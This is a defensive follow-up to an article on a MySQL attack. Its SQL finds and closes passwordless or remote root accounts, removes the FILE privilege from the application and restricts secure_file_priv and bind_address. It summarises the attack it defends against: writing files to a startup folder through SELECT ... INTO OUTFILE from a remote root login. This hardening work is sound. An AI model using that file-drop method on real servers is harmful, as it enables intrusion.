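Following up on the MySQL defense method above: the attack in that section needs three things, a root account with no password, root reachable over the network, and the FILE privilege plus an unrestricted file path for SELECT ... INTO OUTFILE. The statements below, an added example rather than the article's own, check for and close each of them. They use MySQL 5.7/8.0 syntax (the article's GRANT ... IDENTIFIED BY form is pre-8.0); host names, the webapp account and the passwords are placeholders.

```sql
-- Added example (not from the article): finding and fixing the conditions the
-- MySQL section relies on. MySQL 5.7 / 8.0 syntax; account names, hosts and
-- password literals are placeholders.

-- a) Accounts with no password, anonymous accounts, and root reachable
--    from anywhere other than the local machine.
SELECT user, host, plugin, authentication_string
FROM mysql.user
WHERE authentication_string = ''
   OR user = ''
   OR (user = 'root' AND host NOT IN ('localhost', '127.0.0.1', '::1'));

-- b) Give root a password and keep it local only (the article's defense,
--    in current syntax). Anonymous accounts go as well.
ALTER USER 'root'@'localhost' IDENTIFIED BY 'ReplaceWithAStrongPassword!1';
DROP USER IF EXISTS 'root'@'%';
DROP USER IF EXISTS ''@'localhost';
DROP USER IF EXISTS ''@'%';

-- c) The file drop worked because root holds the FILE privilege. Give the
--    application its own account with data access on its database only.
CREATE USER 'webapp'@'localhost' IDENTIFIED BY 'AnotherPlaceholderPassword!2';
GRANT SELECT, INSERT, UPDATE, DELETE ON test.* TO 'webapp'@'localhost';

-- Check that no account other than a DBA still has FILE.
SELECT user, host FROM mysql.user WHERE File_priv = 'Y';

-- d) Server side: where may INTO OUTFILE write at all? Read-only at runtime;
--    it is set in my.cnf / my.ini under [mysqld]:
--      secure_file_priv = /var/lib/mysql-files   (one directory only)
--      secure_file_priv = NULL                   (INTO OUTFILE / LOAD DATA off)
--    An empty value means no restriction, which is what made the startup-folder
--    write possible. Also consider bind-address = 127.0.0.1 so that the
--    "mysql -u root -h 192.168.0.1" connection is not reachable remotely.
SHOW VARIABLES LIKE 'secure_file_priv';
SHOW VARIABLES LIKE 'bind_address';
```

Query (a) is the one to run across a fleet: an empty authentication_string for root, or a root row with host '%', is exactly what the scan in the section above was finding.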